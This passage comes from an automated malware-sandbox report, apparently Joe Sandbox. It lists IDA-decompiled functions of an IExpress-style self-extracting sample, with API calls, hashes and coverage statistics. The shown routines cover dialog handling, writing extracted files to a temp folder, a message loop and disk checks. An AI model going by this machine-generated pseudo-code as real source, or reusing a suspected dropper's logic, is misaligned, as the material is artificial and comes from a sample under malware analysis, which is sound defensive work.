				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E002143D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x219a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00216CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}













                                                                                                                                                                                                        0x002119e0
                                                                                                                                                                                                        0x002119e0
                                                                                                                                                                                                        0x002119eb
                                                                                                                                                                                                        0x002119f2
                                                                                                                                                                                                        0x002119f9
                                                                                                                                                                                                        0x002119fc
                                                                                                                                                                                                        0x00211a01
                                                                                                                                                                                                        0x00211a2a
                                                                                                                                                                                                        0x00211a2e
                                                                                                                                                                                                        0x00211a3e
                                                                                                                                                                                                        0x00211a4f
                                                                                                                                                                                                        0x00211a62
                                                                                                                                                                                                        0x00211a6a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211a03
                                                                                                                                                                                                        0x00211a06
                                                                                                                                                                                                        0x00211a20
                                                                                                                                                                                                        0x00211a20
                                                                                                                                                                                                        0x00211a08
                                                                                                                                                                                                        0x00211a08
                                                                                                                                                                                                        0x00211a14
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211a16
                                                                                                                                                                                                        0x00211a18
                                                                                                                                                                                                        0x00211a70
                                                                                                                                                                                                        0x00211a72
                                                                                                                                                                                                        0x00211a72
                                                                                                                                                                                                        0x00211a14
                                                                                                                                                                                                        0x00211a06
                                                                                                                                                                                                        0x00211a81

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00211A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00211A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00211A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00211A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 00211A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: 5fa466bdd37c2aa34c406248e2842f9dabb44539e66f15bb6daefacff7f63f00
                                                                                                                                                                                                        • Instruction ID: ae436c3489f40c6cfb493ed692211cefc68f3b91a2b198e584f1265f93bdfe94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5fa466bdd37c2aa34c406248e2842f9dabb44539e66f15bb6daefacff7f63f00
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1811E13152110AAFCB00EF64ED0CAEE7BF8EF29300F208150FA1692190CE319EA0CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002163C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E002163C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x218004; // 0x58ac7c6d
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00211781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
				E0021658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x219124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x219124 = 0x80070052;
					_t37 = 0;
				}
				return E00216CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}















                                                                                                                                                                                                        0x002163cb
                                                                                                                                                                                                        0x002163d2
                                                                                                                                                                                                        0x002163d8
                                                                                                                                                                                                        0x002163ea
                                                                                                                                                                                                        0x002163f3
                                                                                                                                                                                                        0x00216401
                                                                                                                                                                                                        0x00216402
                                                                                                                                                                                                        0x00216410
                                                                                                                                                                                                        0x00216415
                                                                                                                                                                                                        0x00216433
                                                                                                                                                                                                        0x00216438
                                                                                                                                                                                                        0x00216449
                                                                                                                                                                                                        0x00216463
                                                                                                                                                                                                        0x0021646d
                                                                                                                                                                                                        0x00216477
                                                                                                                                                                                                        0x00216477
                                                                                                                                                                                                        0x0021647a
                                                                                                                                                                                                        0x0021643a
                                                                                                                                                                                                        0x0021643a
                                                                                                                                                                                                        0x00216444
                                                                                                                                                                                                        0x00216444
                                                                                                                                                                                                        0x00216492

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0021642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0021645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0021647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 002163EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-1116576409
                                                                                                                                                                                                        • Opcode ID: 6005aa58203fbe7502712c13be5d52fd876d26ccc8d0af766c4f92a4a4fce984
                                                                                                                                                                                                        • Instruction ID: 8245f6bb0c3751647a037c344806ba6274257c0ee6a9adfab150220fd4084dbb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6005aa58203fbe7502712c13be5d52fd876d26ccc8d0af766c4f92a4a4fce984
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6721F371A0021CABD720DF25EC89FEE73BCEB68310F1041A9E584A3280CAB05DD48FA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002147E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E002147E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00211680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x2191e0; // 0x30b8f48
						 *(_t34 + 4) = _t11;
						 *0x2191e0 = _t34;
						return 1;
					}
					_t25 =  *0x218584; // 0x0
					E002144B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x218584; // 0x0
				E002144B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}















                                                                                                                                                                                                        0x002147e8
                                                                                                                                                                                                        0x002147f0
                                                                                                                                                                                                        0x002147f4
                                                                                                                                                                                                        0x0021480f
                                                                                                                                                                                                        0x00214811
                                                                                                                                                                                                        0x00214814
                                                                                                                                                                                                        0x00214814
                                                                                                                                                                                                        0x00214816
                                                                                                                                                                                                        0x00214817
                                                                                                                                                                                                        0x00214829
                                                                                                                                                                                                        0x0021482b
                                                                                                                                                                                                        0x0021482f
                                                                                                                                                                                                        0x0021484f
                                                                                                                                                                                                        0x00214852
                                                                                                                                                                                                        0x00214855
                                                                                                                                                                                                        0x00214855
                                                                                                                                                                                                        0x00214857
                                                                                                                                                                                                        0x00214858
                                                                                                                                                                                                        0x00214860
                                                                                                                                                                                                        0x00214865
                                                                                                                                                                                                        0x0021486a
                                                                                                                                                                                                        0x0021486f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00214876
                                                                                                                                                                                                        0x00214831
                                                                                                                                                                                                        0x00214841
                                                                                                                                                                                                        0x00214847
                                                                                                                                                                                                        0x0021480b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021480b
                                                                                                                                                                                                        0x002147f6
                                                                                                                                                                                                        0x00214806
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00214E6F), ref: 002147EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00214823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00214847
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00214851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-1116576409
                                                                                                                                                                                                        • Opcode ID: 3506746f13b3b445269da6e02dd2c007498b42a95afac740d319f1d61a0a0f45
                                                                                                                                                                                                        • Instruction ID: 929d3c444c7be5aea42f6bffacd4429cc61302ce982c4e9e6242b9321340681f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3506746f13b3b445269da6e02dd2c007498b42a95afac740d319f1d61a0a0f45
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F31159782106426FD724AF24AC5CFF23B9AEBA5300B05C528FA4ACB341CE358C528620
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00213680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00213680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}







                                                                                                                                                                                                        0x0021368c
                                                                                                                                                                                                        0x0021368f
                                                                                                                                                                                                        0x00213691
                                                                                                                                                                                                        0x0021369f
                                                                                                                                                                                                        0x002136a7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002136ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002136bc
                                                                                                                                                                                                        0x002136bc
                                                                                                                                                                                                        0x002136c0
                                                                                                                                                                                                        0x002136cb
                                                                                                                                                                                                        0x002136c2
                                                                                                                                                                                                        0x002136c4
                                                                                                                                                                                                        0x002136c4
                                                                                                                                                                                                        0x002136da
                                                                                                                                                                                                        0x002136e0
                                                                                                                                                                                                        0x002136e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002136e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002136ba
                                                                                                                                                                                                        0x002136ed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0021369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002136B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 002136CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 002136DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2776232527-0
                                                                                                                                                                                                        • Opcode ID: 2e86bf8802c8bf4dd9ccd760474cbd3b9f633bbf207e3e5cec755e7e2aeeef7f
                                                                                                                                                                                                        • Instruction ID: 2797ef7585795b93a0fa393e011abb38e5fe047893e2fffbfa42aa3bee42ed4e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2e86bf8802c8bf4dd9ccd760474cbd3b9f633bbf207e3e5cec755e7e2aeeef7f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D901A772A11259BBDF308FA66C4CEEB7ABDEBD5B10F10012DFD05E2184D961C694C664
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002165E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                        			E002165E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}









                                                                                                                                                                                                        0x002165e8
                                                                                                                                                                                                        0x002165ed
                                                                                                                                                                                                        0x002165ef
                                                                                                                                                                                                        0x002165f2
                                                                                                                                                                                                        0x002165f4
                                                                                                                                                                                                        0x002165f4
                                                                                                                                                                                                        0x002165f6
                                                                                                                                                                                                        0x002165f7
                                                                                                                                                                                                        0x00216608
                                                                                                                                                                                                        0x00216611
                                                                                                                                                                                                        0x00216618
                                                                                                                                                                                                        0x0021661c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021660e
                                                                                                                                                                                                        0x00216623
                                                                                                                                                                                                        0x00216625
                                                                                                                                                                                                        0x0021663b
                                                                                                                                                                                                        0x0021663b
                                                                                                                                                                                                        0x0021663d
                                                                                                                                                                                                        0x00216641
                                                                                                                                                                                                        0x00216610
                                                                                                                                                                                                        0x00216610
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216610
                                                                                                                                                                                                        0x00216644
                                                                                                                                                                                                        0x00216647
                                                                                                                                                                                                        0x00216647
                                                                                                                                                                                                        0x00216621
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00212B33), ref: 00216602
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00216612
                                                                                                                                                                                                        • CharPrevA.USER32(?,00000000), ref: 00216629
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00216635
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Prev$Next
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3260447230-0
                                                                                                                                                                                                        • Opcode ID: a05be582624a43a66e6fa1141ed695dab86064d010e2ee122df76db7ec478466
                                                                                                                                                                                                        • Instruction ID: c640e873790f91d51229c407cc704163bcd1f2002564aedbd3c344ce8c9b15c2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a05be582624a43a66e6fa1141ed695dab86064d010e2ee122df76db7ec478466
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8F0F4324161917EE7331F289C8C8FFBFDCCBB7255B2941AFE49982001DA990D868661
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002169B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E002169B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x2181f8 = E00216C70();
				__set_app_type(E00216FBE(2));
				 *0x2188a4 =  *0x2188a4 | 0xffffffff;
				 *0x2188a8 =  *0x2188a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x218528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x21851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00217000();
				if( *0x218000 == 0) {
					__setusermatherr(E00217000);
				}
				E002171EF(_t6);
				return 0;
			}








                                                                                                                                                                                                        0x002169b7
                                                                                                                                                                                                        0x002169c2
                                                                                                                                                                                                        0x002169c8
                                                                                                                                                                                                        0x002169cf
                                                                                                                                                                                                        0x002169d8
                                                                                                                                                                                                        0x002169de
                                                                                                                                                                                                        0x002169e4
                                                                                                                                                                                                        0x002169e6
                                                                                                                                                                                                        0x002169ec
                                                                                                                                                                                                        0x002169f2
                                                                                                                                                                                                        0x002169f4
                                                                                                                                                                                                        0x00216a00
                                                                                                                                                                                                        0x00216a07
                                                                                                                                                                                                        0x00216a0d
                                                                                                                                                                                                        0x00216a0e
                                                                                                                                                                                                        0x00216a15

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00216FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00216FC5
                                                                                                                                                                                                        • __set_app_type.MSVCRT ref: 002169C2
                                                                                                                                                                                                        • __p__fmode.MSVCRT ref: 002169D8
                                                                                                                                                                                                        • __p__commode.MSVCRT ref: 002169E6
                                                                                                                                                                                                        • __setusermatherr.MSVCRT ref: 00216A07
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1632413811-0
                                                                                                                                                                                                        • Opcode ID: 1d40083a259271c1512c91f0695a0ff2636a176634624294c39b8d3ae686eb0d
                                                                                                                                                                                                        • Instruction ID: ecb1f96af541a23eef9ff852e0639c98b17dfe5c132d0e8dc4bc60af6b3af62a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d40083a259271c1512c91f0695a0ff2636a176634624294c39b8d3ae686eb0d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70F0F8741193059FC714AF34BD8E6C83BA2FB78331B118609E862862E1CF3A85A5CE11
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00216952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00216952(CHAR* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				char _v20;
				int _t22;

				_t22 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *__ecx != 0) {
					_t6 =  &_v20; // 0x215760
					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
					}
				}
				return _t22;
			}








                                                                                                                                                                                                        0x0021695b
                                                                                                                                                                                                        0x00216960
                                                                                                                                                                                                        0x00216963
                                                                                                                                                                                                        0x00216966
                                                                                                                                                                                                        0x00216969
                                                                                                                                                                                                        0x0021696c
                                                                                                                                                                                                        0x00216972
                                                                                                                                                                                                        0x00216987
                                                                                                                                                                                                        0x0021699f
                                                                                                                                                                                                        0x0021699f
                                                                                                                                                                                                        0x00216987
                                                                                                                                                                                                        0x002169a7

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W!,?,00000000,00215760,?,A:\), ref: 0021697F
                                                                                                                                                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 00216999
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                                                                                                        • String ID: `W!
                                                                                                                                                                                                        • API String ID: 1705453755-235260415
                                                                                                                                                                                                        • Opcode ID: 81fd7557803e188f9f4f6d69506e0b7f1a3eddb7040f79d15953c5304f3c36e4
                                                                                                                                                                                                        • Instruction ID: 8f0a452c5387dcb466fc2c3b492877205feda84e7f15d55f8a23c5a7df541b32
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 81fd7557803e188f9f4f6d69506e0b7f1a3eddb7040f79d15953c5304f3c36e4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F0F9B6D1122CBBCB11DFE8DC48ADEBBFCEB49701F104296E914E3240DA719A508BD1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:26.9%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:969
                                                                                                                                                                                                        Total number of Limit Nodes:43
